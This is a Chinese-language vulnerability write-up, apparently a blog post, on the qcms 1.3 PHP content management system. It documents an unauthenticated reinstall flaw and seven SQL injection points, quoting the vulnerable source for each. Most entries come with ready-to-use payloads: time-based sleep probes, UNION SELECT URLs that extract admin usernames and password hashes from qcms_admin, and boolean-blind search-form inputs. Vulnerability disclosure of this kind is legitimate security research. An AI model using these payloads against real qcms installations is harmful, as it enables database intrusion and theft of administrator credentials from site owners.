qcms1.3重装漏洞&&注入漏洞

qcms1.3

下载地址:http://down.admin5.com/php/1402.html

1.漏洞文件qcms/install/index.php文件:

1.1根本没验证安装文件,知道数据库账号密码直接可以重装

漏洞文件qcms/inc/hits.php第3-10行:

<?php

$nid=$_GET[‘id’];

$ns=new news;

$result=$ns->news_view($nid);

$qesy=$ns->news_hits($nid);

$nmyrow=mysql_fetch_array($result);

echo “document.writeln(‘”.$nmyrow[‘readcount’].”‘)”;

?>

跟进qcms/news类的两个函数

function news_view($id)

{global $bqz;

$exec=”select “.$bqz.”news.*,”.$bqz.”category.* from “.$bqz.”news,”.$bqz.”category where “.$bqz.”news.cid=”.$bqz.”category.cid and newsid=”.$id.””;

$result=mysql_query($exec);

return $result;

}

function news_hits($id)

{global $bqz;

$exec=”update “.$bqz.”news set readcount=readcount+1 where newsid=”.$id.””;

mysql_query($exec);

}

sql injection 1:

news_view没有任何过滤,可以使用时间盲注

new_hits没有任何过滤,但是nysql语句和news_view紧跟,此处不考虑

padyload:

http://localhost/inc/hits.php?id=2 and sleep(1) //延时2秒

http://localhost/inc/hits.php?id=2 and sleep(0) //无延时

漏洞文件qcms/buy.php第6-28行:

if(isset($_GET[‘id’]))

{

$cn=new sys();

$result=$cn->view(“select * from “.$bqz.”news where newsid=”.$_GET[‘id’].””);

$rs=mysql_fetch_array($result);

 

if($rs[‘c_field’]!=”)

{

$c_field=explode(‘o’,$rs[‘c_field’]);

}

else

{

echo “<script>alert(‘”.$lang[“cs_err”].”‘);history.back();</script>”;

return ;

}

for($i=0;$i<count($c_field);$i++)

{

$field=explode(‘|||’,$c_field[$i]);

if(is_array($field))

{

$rc_field[$field[0]]=$field[1];

}

}

跟进qcms/sys类的view函数,qcms/inc/sys.php第462-466行

function view($sql)

{

$result=mysql_query($sql);

return $result;

}

sql injection 2:

可以看到无任何过滤,可以使用布尔盲注、时间盲注、联合查询

padyload:

http://localhost/buy.php?id=-1943%20union%20select%201,2,3,4,concat_ws(0x20,id,admin_name,admin_password),6,7,8,9,10,11,12,13,14%20from%20qcms_admin%23

4.漏洞文件qcms/down.php第5-28行:

if(isset($_GET[‘id’]))

{

$cn=new sys();

$result=$cn->view(“select * from “.$bqz.”news where newsid=”.$_GET[‘id’].””);

$rs=mysql_fetch_array($result);

 

if($rs[‘c_field’]!=”)

{

$c_field=explode(‘¡ð’,$rs[‘c_field’]);

}

else

{

echo “<script>alert(‘”.$lang[“cs_err”].”‘);history.back();</script>”;

return ;

}

for($i=0;$i<count($c_field);$i++)

{

$field=explode(‘|||’,$c_field[$i]);

if(is_array($field))

{

$rc_field[$field[0]]=$field[1];

}

}

}

sql injection 3:

可以看到无任何过滤,可以使用布尔盲注、时间盲注、联合查询

padyload:

http://localhost/down.php?id=-1943%20union%20select%201,2,3,4,concat_ws(0x20,id,admin_name,admin_password),6,7,8,9,10,11,12,13,14%20from%20qcms_admin%23

5.漏洞文件qcms/inc/category.php第30-35行:

function cate_info($cid)

{global $bqz;

$sql=”select * from “.$bqz.”category where cid=$cid”; //值直接代入查询

$result=mysql_query($sql);

return $result;

}

全局搜索谁调用了cate_info函数

跟进qcms/inc/temp.php,第32-40行:

function list_temp($id,$page_html=”)

{

global $install; global $temp_url;

$cate=new category;

$result=$cate->cate_info($id);

$cmyrow=mysql_fetch_array($result);

$xx=replace_list(file_get_contents($_SERVER[‘DOCUMENT_ROOT’].$install.”templist/”.$temp_url.”/”.$cmyrow[‘ctemp’]),$id,$page_html);

return $xx;

}

全局搜索谁调用了list_temp函数

跟进qcms/list.php,第26-33行:

echo list_temp($_GET[‘id’]);

$c->end();

}

else

{

echo list_temp($_GET[‘id’]);

}

?>

sql injection 4:

可以看到直接使用GET传递id值无过滤,可以使用布尔盲注、时间盲注、联合查询

6.漏洞文件qcms/sys.php第326-331行:

function jss_view()

{global $bqz;

$exec=”select * from “.$bqz.”jss where id=”.$_GET[‘id’].””;

$result=mysql_query($exec);

return $result;

}

搜索调用jss_view的函数

跟进qcms/inc/temp.php文件,第75-82行:

function js_temp($id)

{

global $install;

$sys=new sys;

$result=$sys->jss_view($id);

$dmyrow=mysql_fetch_array($result);

return replace_index($dmyrow[‘js_code’]);

}

搜索调用js_temp的函数的

跟进qcms/inc/js.php文件

<?php

include(“conn.php”);

include(“category.php”);

include(“news.php”);

include(“sys.php”);

include(“tfunction.php”);

include(“temp.php”);

require_once(“cache.php”);

?>

<?

global $install;

if($c_open==1)

{

$c = new cache();

$c->start();

?>

document.writeln(‘<?=dm2js(js_temp($_GET[‘id’]))?>’);

<?php

$c->end();

}

else

{

?>

document.writeln(‘<?=dm2js(js_temp($_GET[‘id’]))?>’);

<?php

}

?>

sql injection 5:

第17行直接直接使用GET传递id的值,没有过滤,可以使用布尔盲注、时间盲注、联合查询

payload:http:localhost/inc/js.php?id=1%20union%20select%201,2,concat_ws(0x20,id,admin_name,admin_password)%20from%20qcms_admin%23

7.漏洞文件qcms/sys.php第227-232行:

function diy_view($id)

{global $bqz;

$exec=”select * from “.$bqz.”diy where id=”.$id.””;

$result=mysql_query($exec);

return $result;

}

跟进diy_view函数,qcms/inc/temp.php,第59-74行:

function diy_temp($diyid)//×Ô¶¨ÒåÒ³ÃæÄ£°æ

{

global $install;

if(empty($_GET[‘id’])==true)

{

$id=$diyid;

}

else

{

$id=$_GET[‘id’];

}

$sys=new sys;

$result=$sys->diy_view($id);

$dmyrow=mysql_fetch_array($result);

return replace_index($dmyrow[‘diy’]);

}

跟进diy_temp函数,qcms/diy.php:

<?php

include(“inc/conn.php”);

include(“language/”.$language);

include(“inc/category.php”);

include(“inc/news.php”);

include(“inc/sys.php”);

include(“inc/tfunction.php”);

if($html==’0′){

define(“temp”, “temp”);

}

elseif($html==’1′){

define(“temp”, “temp_html”);

}

elseif($html==’2′){

define(“temp”, “temp_rewrite”);

}

include(“inc/”.temp.”.php”);

require_once(“inc/cache.php”);

?>

<?

global $install;

if($c_open==1)

{

$c = new cache();

$c->start();

echo diy_temp($_GET[‘id’]);

$c->end();

}

else

{

echo diy_temp($_GET[‘id’]);

}

?>

sql injection 6:

第26行和31直接直接使用GET传递id的值,没有过滤,可以使用布尔盲注、时间盲注、联合查询

8.漏洞文件qcms/search.php第80-94行:

<?php

$keyword=$_POST[‘keyword’];

if(empty($keyword)==true)

{

echo $lang[“please_click_keyword”];

}

else

{

$keys=new news;

$result=$keys->news_search($keyword);

while($keyrow=mysql_fetch_array($result))

{

 

?>

跟进qcms/inc/news.php,第170-175行:

function news_search($keyword)//搜索标题中有关键字的内容

{global $bqz;

$exec=”select * from “.$bqz.”news where ntitle like ‘%”.$keyword.”%'”;

$result=mysql_query($exec);

return $result;

}

sql injection7:

第172行没有过滤值,直接代入查询,可以使用布尔盲注,时间盲注:

payload:

keyword=-5279’ OR 1869=1868#&button=%E6%90%9C%E7%B4%A2

keyword=-5279′ OR 1869=1869#&button=%E6%90%9C%E7%B4%A2

0 条评论
发表一条评论